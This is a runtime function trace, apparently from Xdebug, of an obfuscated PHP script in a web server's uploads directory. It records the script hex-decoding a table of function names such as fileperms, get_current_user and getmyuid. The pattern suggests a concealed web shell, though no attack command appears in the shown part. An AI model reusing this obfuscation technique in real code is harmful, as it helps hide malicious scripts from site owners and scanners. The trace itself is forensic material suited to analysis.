3	1173	0	0.043038	585248	hexdec	0		/var/www/html/uploads/index.php	178	1	'73'
3	1173	1	0.043050	585296
3	1173	R			115
3	1174	0	0.043063	585216	chr	0		/var/www/html/uploads/index.php	178	1	115
3	1174	1	0.043075	585256
3	1174	R			's'
2		A						/var/www/html/uploads/index.php	178	$r .= 's'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1175	0	0.043105	585248	hexdec	0		/var/www/html/uploads/index.php	178	1	'73'
3	1175	1	0.043116	585296
3	1175	R			115
3	1176	0	0.043129	585216	chr	0		/var/www/html/uploads/index.php	178	1	115
3	1176	1	0.043141	585256
3	1176	R			's'
2		A						/var/www/html/uploads/index.php	178	$r .= 's'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1177	0	0.043170	585248	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	1177	1	0.043182	585296
3	1177	R			101
3	1178	0	0.043194	585216	chr	0		/var/www/html/uploads/index.php	178	1	101
3	1178	1	0.043209	585256
3	1178	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1179	0	0.043240	585248	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	1179	1	0.043252	585296
3	1179	R			116
3	1180	0	0.043264	585216	chr	0		/var/www/html/uploads/index.php	178	1	116
3	1180	1	0.043275	585256
3	1180	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	1170	1	0.043305	585216
2	1170	R			'isset'
1		A						/var/www/html/uploads/index.php	8	$func[58] = 'isset'
1		A						/var/www/html/uploads/index.php	7	$i++
2	1181	0	0.043338	585216	dehex	1		/var/www/html/uploads/index.php	8	1	'66696c657065726d73'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 17
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	1182	0	0.043380	585248	hexdec	0		/var/www/html/uploads/index.php	178	1	'66'
3	1182	1	0.043392	585296
3	1182	R			102
3	1183	0	0.043404	585216	chr	0		/var/www/html/uploads/index.php	178	1	102
3	1183	1	0.043415	585256
3	1183	R			'f'
2		A						/var/www/html/uploads/index.php	178	$r .= 'f'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1184	0	0.043446	585280	hexdec	0		/var/www/html/uploads/index.php	178	1	'69'
3	1184	1	0.043458	585328
3	1184	R			105
3	1185	0	0.043470	585248	chr	0		/var/www/html/uploads/index.php	178	1	105
3	1185	1	0.043482	585288
3	1185	R			'i'
2		A						/var/www/html/uploads/index.php	178	$r .= 'i'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1186	0	0.043513	585280	hexdec	0		/var/www/html/uploads/index.php	178	1	'6c'
3	1186	1	0.043525	585328
3	1186	R			108
3	1187	0	0.043537	585248	chr	0		/var/www/html/uploads/index.php	178	1	108
3	1187	1	0.043548	585288
3	1187	R			'l'
2		A						/var/www/html/uploads/index.php	178	$r .= 'l'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1188	0	0.043579	585280	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	1188	1	0.043591	585328
3	1188	R			101
3	1189	0	0.043603	585248	chr	0		/var/www/html/uploads/index.php	178	1	101
3	1189	1	0.043614	585288
3	1189	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1190	0	0.043645	585280	hexdec	0		/var/www/html/uploads/index.php	178	1	'70'
3	1190	1	0.043657	585328
3	1190	R			112
3	1191	0	0.043669	585248	chr	0		/var/www/html/uploads/index.php	178	1	112
3	1191	1	0.043681	585288
3	1191	R			'p'
2		A						/var/www/html/uploads/index.php	178	$r .= 'p'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1192	0	0.043711	585280	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	1192	1	0.043723	585328
3	1192	R			101
3	1193	0	0.043735	585248	chr	0		/var/www/html/uploads/index.php	178	1	101
3	1193	1	0.043747	585288
3	1193	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1194	0	0.043777	585280	hexdec	0		/var/www/html/uploads/index.php	178	1	'72'
3	1194	1	0.043788	585328
3	1194	R			114
3	1195	0	0.043801	585248	chr	0		/var/www/html/uploads/index.php	178	1	114
3	1195	1	0.043812	585288
3	1195	R			'r'
2		A						/var/www/html/uploads/index.php	178	$r .= 'r'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1196	0	0.043843	585280	hexdec	0		/var/www/html/uploads/index.php	178	1	'6d'
3	1196	1	0.043854	585328
3	1196	R			109
3	1197	0	0.043867	585248	chr	0		/var/www/html/uploads/index.php	178	1	109
3	1197	1	0.043878	585288
3	1197	R			'm'
2		A						/var/www/html/uploads/index.php	178	$r .= 'm'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1198	0	0.043908	585288	hexdec	0		/var/www/html/uploads/index.php	178	1	'73'
3	1198	1	0.043924	585336
3	1198	R			115
3	1199	0	0.043937	585256	chr	0		/var/www/html/uploads/index.php	178	1	115
3	1199	1	0.043949	585296
3	1199	R			's'
2		A						/var/www/html/uploads/index.php	178	$r .= 's'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	1181	1	0.043979	585256
2	1181	R			'fileperms'
1		A						/var/www/html/uploads/index.php	8	$func[59] = 'fileperms'
1		A						/var/www/html/uploads/index.php	7	$i++
2	1200	0	0.044013	585256	dehex	1		/var/www/html/uploads/index.php	8	1	'7374726c656e'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 11
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	1201	0	0.044054	585288	hexdec	0		/var/www/html/uploads/index.php	178	1	'73'
3	1201	1	0.044065	585336
3	1201	R			115
3	1202	0	0.044078	585256	chr	0		/var/www/html/uploads/index.php	178	1	115
3	1202	1	0.044090	585296
3	1202	R			's'
2		A						/var/www/html/uploads/index.php	178	$r .= 's'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1203	0	0.044120	585320	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	1203	1	0.044132	585368
3	1203	R			116
3	1204	0	0.044144	585288	chr	0		/var/www/html/uploads/index.php	178	1	116
3	1204	1	0.044156	585328
3	1204	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1205	0	0.044186	585320	hexdec	0		/var/www/html/uploads/index.php	178	1	'72'
3	1205	1	0.044198	585368
3	1205	R			114
3	1206	0	0.044210	585288	chr	0		/var/www/html/uploads/index.php	178	1	114
3	1206	1	0.044222	585328
3	1206	R			'r'
2		A						/var/www/html/uploads/index.php	178	$r .= 'r'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1207	0	0.044252	585320	hexdec	0		/var/www/html/uploads/index.php	178	1	'6c'
3	1207	1	0.044264	585368
3	1207	R			108
3	1208	0	0.044277	585288	chr	0		/var/www/html/uploads/index.php	178	1	108
3	1208	1	0.044288	585328
3	1208	R			'l'
2		A						/var/www/html/uploads/index.php	178	$r .= 'l'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1209	0	0.044318	585320	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	1209	1	0.044330	585368
3	1209	R			101
3	1210	0	0.044342	585288	chr	0		/var/www/html/uploads/index.php	178	1	101
3	1210	1	0.044353	585328
3	1210	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1211	0	0.044383	585320	hexdec	0		/var/www/html/uploads/index.php	178	1	'6e'
3	1211	1	0.044396	585368
3	1211	R			110
3	1212	0	0.044408	585288	chr	0		/var/www/html/uploads/index.php	178	1	110
3	1212	1	0.044419	585328
3	1212	R			'n'
2		A						/var/www/html/uploads/index.php	178	$r .= 'n'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	1200	1	0.044449	585288
2	1200	R			'strlen'
1		A						/var/www/html/uploads/index.php	8	$func[60] = 'strlen'
1		A						/var/www/html/uploads/index.php	7	$i++
2	1213	0	0.044483	585288	dehex	1		/var/www/html/uploads/index.php	8	1	'636f756e74'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 9
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	1214	0	0.044524	585320	hexdec	0		/var/www/html/uploads/index.php	178	1	'63'
3	1214	1	0.044536	585368
3	1214	R			99
3	1215	0	0.044548	585288	chr	0		/var/www/html/uploads/index.php	178	1	99
3	1215	1	0.044560	585328
3	1215	R			'c'
2		A						/var/www/html/uploads/index.php	178	$r .= 'c'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1216	0	0.044591	585352	hexdec	0		/var/www/html/uploads/index.php	178	1	'6f'
3	1216	1	0.044603	585400
3	1216	R			111
3	1217	0	0.044615	585320	chr	0		/var/www/html/uploads/index.php	178	1	111
3	1217	1	0.044627	585360
3	1217	R			'o'
2		A						/var/www/html/uploads/index.php	178	$r .= 'o'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1218	0	0.044661	585352	hexdec	0		/var/www/html/uploads/index.php	178	1	'75'
3	1218	1	0.044672	585400
3	1218	R			117
3	1219	0	0.044685	585320	chr	0		/var/www/html/uploads/index.php	178	1	117
3	1219	1	0.044696	585360
3	1219	R			'u'
2		A						/var/www/html/uploads/index.php	178	$r .= 'u'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1220	0	0.044726	585352	hexdec	0		/var/www/html/uploads/index.php	178	1	'6e'
3	1220	1	0.044738	585400
3	1220	R			110
3	1221	0	0.044751	585320	chr	0		/var/www/html/uploads/index.php	178	1	110
3	1221	1	0.044762	585360
3	1221	R			'n'
2		A						/var/www/html/uploads/index.php	178	$r .= 'n'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1222	0	0.044792	585352	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	1222	1	0.044803	585400
3	1222	R			116
3	1223	0	0.044816	585320	chr	0		/var/www/html/uploads/index.php	178	1	116
3	1223	1	0.044827	585360
3	1223	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	1213	1	0.044857	585320
2	1213	R			'count'
1		A						/var/www/html/uploads/index.php	8	$func[61] = 'count'
1		A						/var/www/html/uploads/index.php	7	$i++
2	1224	0	0.044890	585320	dehex	1		/var/www/html/uploads/index.php	8	1	'726f756e64'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 9
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	1225	0	0.044931	585352	hexdec	0		/var/www/html/uploads/index.php	178	1	'72'
3	1225	1	0.044943	585400
3	1225	R			114
3	1226	0	0.044955	585320	chr	0		/var/www/html/uploads/index.php	178	1	114
3	1226	1	0.044967	585360
3	1226	R			'r'
2		A						/var/www/html/uploads/index.php	178	$r .= 'r'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1227	0	0.044998	585384	hexdec	0		/var/www/html/uploads/index.php	178	1	'6f'
3	1227	1	0.045010	585432
3	1227	R			111
3	1228	0	0.045023	585352	chr	0		/var/www/html/uploads/index.php	178	1	111
3	1228	1	0.045038	585392
3	1228	R			'o'
2		A						/var/www/html/uploads/index.php	178	$r .= 'o'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1229	0	0.045069	585384	hexdec	0		/var/www/html/uploads/index.php	178	1	'75'
3	1229	1	0.045081	585432
3	1229	R			117
3	1230	0	0.045093	585352	chr	0		/var/www/html/uploads/index.php	178	1	117
3	1230	1	0.045104	585392
3	1230	R			'u'
2		A						/var/www/html/uploads/index.php	178	$r .= 'u'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1231	0	0.045134	585384	hexdec	0		/var/www/html/uploads/index.php	178	1	'6e'
3	1231	1	0.045146	585432
3	1231	R			110
3	1232	0	0.045158	585352	chr	0		/var/www/html/uploads/index.php	178	1	110
3	1232	1	0.045181	585392
3	1232	R			'n'
2		A						/var/www/html/uploads/index.php	178	$r .= 'n'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1233	0	0.045211	585384	hexdec	0		/var/www/html/uploads/index.php	178	1	'64'
3	1233	1	0.045223	585432
3	1233	R			100
3	1234	0	0.045235	585352	chr	0		/var/www/html/uploads/index.php	178	1	100
3	1234	1	0.045247	585392
3	1234	R			'd'
2		A						/var/www/html/uploads/index.php	178	$r .= 'd'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	1224	1	0.045277	585352
2	1224	R			'round'
1		A						/var/www/html/uploads/index.php	8	$func[62] = 'round'
1		A						/var/www/html/uploads/index.php	7	$i++
2	1235	0	0.045311	585352	dehex	1		/var/www/html/uploads/index.php	8	1	'6d696d655f636f6e74656e745f74797065'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 33
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	1236	0	0.045353	585384	hexdec	0		/var/www/html/uploads/index.php	178	1	'6d'
3	1236	1	0.045365	585432
3	1236	R			109
3	1237	0	0.045382	585352	chr	0		/var/www/html/uploads/index.php	178	1	109
3	1237	1	0.045394	585392
3	1237	R			'm'
2		A						/var/www/html/uploads/index.php	178	$r .= 'm'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1238	0	0.045426	585416	hexdec	0		/var/www/html/uploads/index.php	178	1	'69'
3	1238	1	0.045438	585464
3	1238	R			105
3	1239	0	0.045451	585384	chr	0		/var/www/html/uploads/index.php	178	1	105
3	1239	1	0.045462	585424
3	1239	R			'i'
2		A						/var/www/html/uploads/index.php	178	$r .= 'i'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1240	0	0.045493	585416	hexdec	0		/var/www/html/uploads/index.php	178	1	'6d'
3	1240	1	0.045505	585464
3	1240	R			109
3	1241	0	0.045517	585384	chr	0		/var/www/html/uploads/index.php	178	1	109
3	1241	1	0.045529	585424
3	1241	R			'm'
2		A						/var/www/html/uploads/index.php	178	$r .= 'm'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1242	0	0.045559	585416	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	1242	1	0.045570	585464
3	1242	R			101
3	1243	0	0.045583	585384	chr	0		/var/www/html/uploads/index.php	178	1	101
3	1243	1	0.045594	585424
3	1243	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1244	0	0.045624	585416	hexdec	0		/var/www/html/uploads/index.php	178	1	'5f'
3	1244	1	0.045636	585464
3	1244	R			95
3	1245	0	0.045648	585384	chr	0		/var/www/html/uploads/index.php	178	1	95
3	1245	1	0.045660	585424
3	1245	R			'_'
2		A						/var/www/html/uploads/index.php	178	$r .= '_'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1246	0	0.045691	585416	hexdec	0		/var/www/html/uploads/index.php	178	1	'63'
3	1246	1	0.045702	585464
3	1246	R			99
3	1247	0	0.045715	585384	chr	0		/var/www/html/uploads/index.php	178	1	99
3	1247	1	0.045726	585424
3	1247	R			'c'
2		A						/var/www/html/uploads/index.php	178	$r .= 'c'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1248	0	0.045756	585416	hexdec	0		/var/www/html/uploads/index.php	178	1	'6f'
3	1248	1	0.045768	585464
3	1248	R			111
3	1249	0	0.045780	585384	chr	0		/var/www/html/uploads/index.php	178	1	111
3	1249	1	0.045791	585424
3	1249	R			'o'
2		A						/var/www/html/uploads/index.php	178	$r .= 'o'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1250	0	0.045821	585416	hexdec	0		/var/www/html/uploads/index.php	178	1	'6e'
3	1250	1	0.045833	585464
3	1250	R			110
3	1251	0	0.045845	585384	chr	0		/var/www/html/uploads/index.php	178	1	110
3	1251	1	0.045857	585424
3	1251	R			'n'
2		A						/var/www/html/uploads/index.php	178	$r .= 'n'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1252	0	0.045887	585424	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	1252	1	0.045899	585472
3	1252	R			116
3	1253	0	0.045911	585392	chr	0		/var/www/html/uploads/index.php	178	1	116
3	1253	1	0.045923	585432
3	1253	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1254	0	0.045953	585424	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	1254	1	0.045965	585472
3	1254	R			101
3	1255	0	0.045977	585392	chr	0		/var/www/html/uploads/index.php	178	1	101
3	1255	1	0.045989	585432
3	1255	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1256	0	0.046019	585424	hexdec	0		/var/www/html/uploads/index.php	178	1	'6e'
3	1256	1	0.046030	585472
3	1256	R			110
3	1257	0	0.046043	585392	chr	0		/var/www/html/uploads/index.php	178	1	110
3	1257	1	0.046054	585432
3	1257	R			'n'
2		A						/var/www/html/uploads/index.php	178	$r .= 'n'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1258	0	0.046084	585424	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	1258	1	0.046096	585472
3	1258	R			116
3	1259	0	0.046111	585392	chr	0		/var/www/html/uploads/index.php	178	1	116
3	1259	1	0.046122	585432
3	1259	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1260	0	0.046153	585424	hexdec	0		/var/www/html/uploads/index.php	178	1	'5f'
3	1260	1	0.046165	585472
3	1260	R			95
3	1261	0	0.046177	585392	chr	0		/var/www/html/uploads/index.php	178	1	95
3	1261	1	0.046189	585432
3	1261	R			'_'
2		A						/var/www/html/uploads/index.php	178	$r .= '_'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1262	0	0.046219	585424	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	1262	1	0.046231	585472
3	1262	R			116
3	1263	0	0.046244	585392	chr	0		/var/www/html/uploads/index.php	178	1	116
3	1263	1	0.046255	585432
3	1263	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1264	0	0.046285	585424	hexdec	0		/var/www/html/uploads/index.php	178	1	'79'
3	1264	1	0.046296	585472
3	1264	R			121
3	1265	0	0.046309	585392	chr	0		/var/www/html/uploads/index.php	178	1	121
3	1265	1	0.046321	585432
3	1265	R			'y'
2		A						/var/www/html/uploads/index.php	178	$r .= 'y'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1266	0	0.046351	585424	hexdec	0		/var/www/html/uploads/index.php	178	1	'70'
3	1266	1	0.046362	585472
3	1266	R			112
3	1267	0	0.046374	585392	chr	0		/var/www/html/uploads/index.php	178	1	112
3	1267	1	0.046386	585432
3	1267	R			'p'
2		A						/var/www/html/uploads/index.php	178	$r .= 'p'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1268	0	0.046416	585432	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	1268	1	0.046428	585480
3	1268	R			101
3	1269	0	0.046440	585400	chr	0		/var/www/html/uploads/index.php	178	1	101
3	1269	1	0.046451	585440
3	1269	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	1235	1	0.046481	585400
2	1235	R			'mime_content_type'
1		A						/var/www/html/uploads/index.php	8	$func[63] = 'mime_content_type'
1		A						/var/www/html/uploads/index.php	7	$i++
2	1270	0	0.046516	585400	dehex	1		/var/www/html/uploads/index.php	8	1	'6765745f63757272656e745f75736572'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 31
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	1271	0	0.046558	585432	hexdec	0		/var/www/html/uploads/index.php	178	1	'67'
3	1271	1	0.046570	585480
3	1271	R			103
3	1272	0	0.046582	585400	chr	0		/var/www/html/uploads/index.php	178	1	103
3	1272	1	0.046593	585440
3	1272	R			'g'
2		A						/var/www/html/uploads/index.php	178	$r .= 'g'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1273	0	0.046624	585464	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	1273	1	0.046636	585512
3	1273	R			101
3	1274	0	0.046648	585432	chr	0		/var/www/html/uploads/index.php	178	1	101
3	1274	1	0.046659	585472
3	1274	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1275	0	0.046690	585464	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	1275	1	0.046702	585512
3	1275	R			116
3	1276	0	0.046714	585432	chr	0		/var/www/html/uploads/index.php	178	1	116
3	1276	1	0.046725	585472
3	1276	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1277	0	0.046755	585464	hexdec	0		/var/www/html/uploads/index.php	178	1	'5f'
3	1277	1	0.046766	585512
3	1277	R			95
3	1278	0	0.046778	585432	chr	0		/var/www/html/uploads/index.php	178	1	95
3	1278	1	0.046790	585472
3	1278	R			'_'
2		A						/var/www/html/uploads/index.php	178	$r .= '_'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1279	0	0.046824	585464	hexdec	0		/var/www/html/uploads/index.php	178	1	'63'
3	1279	1	0.046836	585512
3	1279	R			99
3	1280	0	0.046848	585432	chr	0		/var/www/html/uploads/index.php	178	1	99
3	1280	1	0.046860	585472
3	1280	R			'c'
2		A						/var/www/html/uploads/index.php	178	$r .= 'c'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1281	0	0.046890	585464	hexdec	0		/var/www/html/uploads/index.php	178	1	'75'
3	1281	1	0.046902	585512
3	1281	R			117
3	1282	0	0.046914	585432	chr	0		/var/www/html/uploads/index.php	178	1	117
3	1282	1	0.046925	585472
3	1282	R			'u'
2		A						/var/www/html/uploads/index.php	178	$r .= 'u'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1283	0	0.046955	585464	hexdec	0		/var/www/html/uploads/index.php	178	1	'72'
3	1283	1	0.046966	585512
3	1283	R			114
3	1284	0	0.046979	585432	chr	0		/var/www/html/uploads/index.php	178	1	114
3	1284	1	0.046990	585472
3	1284	R			'r'
2		A						/var/www/html/uploads/index.php	178	$r .= 'r'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1285	0	0.047021	585464	hexdec	0		/var/www/html/uploads/index.php	178	1	'72'
3	1285	1	0.047032	585512
3	1285	R			114
3	1286	0	0.047045	585432	chr	0		/var/www/html/uploads/index.php	178	1	114
3	1286	1	0.047056	585472
3	1286	R			'r'
2		A						/var/www/html/uploads/index.php	178	$r .= 'r'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1287	0	0.047086	585472	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	1287	1	0.047098	585520
3	1287	R			101
3	1288	0	0.047110	585440	chr	0		/var/www/html/uploads/index.php	178	1	101
3	1288	1	0.047122	585480
3	1288	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1289	0	0.047152	585472	hexdec	0		/var/www/html/uploads/index.php	178	1	'6e'
3	1289	1	0.047164	585520
3	1289	R			110
3	1290	0	0.047176	585440	chr	0		/var/www/html/uploads/index.php	178	1	110
3	1290	1	0.047187	585480
3	1290	R			'n'
2		A						/var/www/html/uploads/index.php	178	$r .= 'n'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1291	0	0.047218	585472	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	1291	1	0.047230	585520
3	1291	R			116
3	1292	0	0.047242	585440	chr	0		/var/www/html/uploads/index.php	178	1	116
3	1292	1	0.047253	585480
3	1292	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1293	0	0.047283	585472	hexdec	0		/var/www/html/uploads/index.php	178	1	'5f'
3	1293	1	0.047295	585520
3	1293	R			95
3	1294	0	0.047307	585440	chr	0		/var/www/html/uploads/index.php	178	1	95
3	1294	1	0.047318	585480
3	1294	R			'_'
2		A						/var/www/html/uploads/index.php	178	$r .= '_'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1295	0	0.047349	585472	hexdec	0		/var/www/html/uploads/index.php	178	1	'75'
3	1295	1	0.047361	585520
3	1295	R			117
3	1296	0	0.047373	585440	chr	0		/var/www/html/uploads/index.php	178	1	117
3	1296	1	0.047384	585480
3	1296	R			'u'
2		A						/var/www/html/uploads/index.php	178	$r .= 'u'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1297	0	0.047414	585472	hexdec	0		/var/www/html/uploads/index.php	178	1	'73'
3	1297	1	0.047426	585520
3	1297	R			115
3	1298	0	0.047438	585440	chr	0		/var/www/html/uploads/index.php	178	1	115
3	1298	1	0.047449	585480
3	1298	R			's'
2		A						/var/www/html/uploads/index.php	178	$r .= 's'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1299	0	0.047479	585472	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	1299	1	0.047491	585520
3	1299	R			101
3	1300	0	0.047503	585440	chr	0		/var/www/html/uploads/index.php	178	1	101
3	1300	1	0.047514	585480
3	1300	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1301	0	0.047547	585472	hexdec	0		/var/www/html/uploads/index.php	178	1	'72'
3	1301	1	0.047559	585520
3	1301	R			114
3	1302	0	0.047572	585440	chr	0		/var/www/html/uploads/index.php	178	1	114
3	1302	1	0.047583	585480
3	1302	R			'r'
2		A						/var/www/html/uploads/index.php	178	$r .= 'r'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	1270	1	0.047614	585448
2	1270	R			'get_current_user'
1		A						/var/www/html/uploads/index.php	8	$func[64] = 'get_current_user'
1		A						/var/www/html/uploads/index.php	7	$i++
2	1303	0	0.047649	585448	dehex	1		/var/www/html/uploads/index.php	8	1	'6765746d79756964'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 15
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	1304	0	0.047689	585480	hexdec	0		/var/www/html/uploads/index.php	178	1	'67'
3	1304	1	0.047701	585528
3	1304	R			103
3	1305	0	0.047714	585448	chr	0		/var/www/html/uploads/index.php	178	1	103
3	1305	1	0.047725	585488
3	1305	R			'g'
2		A						/var/www/html/uploads/index.php	178	$r .= 'g'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1306	0	0.047756	585512	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	1306	1	0.047768	585560
3	1306	R			101
3	1307	0	0.047780	585480	chr	0		/var/www/html/uploads/index.php	178	1	101
3	1307	1	0.047792	585520
3	1307	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1308	0	0.047822	585512	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	1308	1	0.047834	585560
3	1308	R			116
3	1309	0	0.047846	585480	chr	0		/var/www/html/uploads/index.php	178	1	116
3	1309	1	0.047858	585520
3	1309	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1310	0	0.047888	585512	hexdec	0		/var/www/html/uploads/index.php	178	1	'6d'
3	1310	1	0.047899	585560
3	1310	R			109
3	1311	0	0.047912	585480	chr	0		/var/www/html/uploads/index.php	178	1	109
3	1311	1	0.047923	585520
3	1311	R			'm'
2		A						/var/www/html/uploads/index.php	178	$r .= 'm'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1312	0	0.047953	585512	hexdec	0		/var/www/html/uploads/index.php	178	1	'79'
3	1312	1	0.047965	585560
3	1312	R			121
3	1313	0	0.047977	585480	chr	0		/var/www/html/uploads/index.php	178	1	121
3	1313	1	0.047988	585520
3	1313	R			'y'
2		A						/var/www/html/uploads/index.php	178	$r .= 'y'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1314	0	0.048018	585512	hexdec	0		/var/www/html/uploads/index.php	178	1	'75'
3	1314	1	0.048030	585560
3	1314	R			117
3	1315	0	0.048042	585480	chr	0		/var/www/html/uploads/index.php	178	1	117
3	1315	1	0.048053	585520
3	1315	R			'u'
2		A						/var/www/html/uploads/index.php	178	$r .= 'u'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1316	0	0.048083	585512	hexdec	0		/var/www/html/uploads/index.php	178	1	'69'
3	1316	1	0.048095	585560
3	1316	R			105
3	1317	0	0.048107	585480	chr	0		/var/www/html/uploads/index.php	178	1	105
3	1317	1	0.048118	585520
3	1317	R			'i'
2		A						/var/www/html/uploads/index.php	178	$r .= 'i'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1318	0	0.048149	585512	hexdec	0		/var/www/html/uploads/index.php	178	1	'64'
3	1318	1	0.048160	585560
3	1318	R			100
3	1319	0	0.048172	585480	chr	0		/var/www/html/uploads/index.php	178	1	100
3	1319	1	0.048183	585520
3	1319	R			'd'
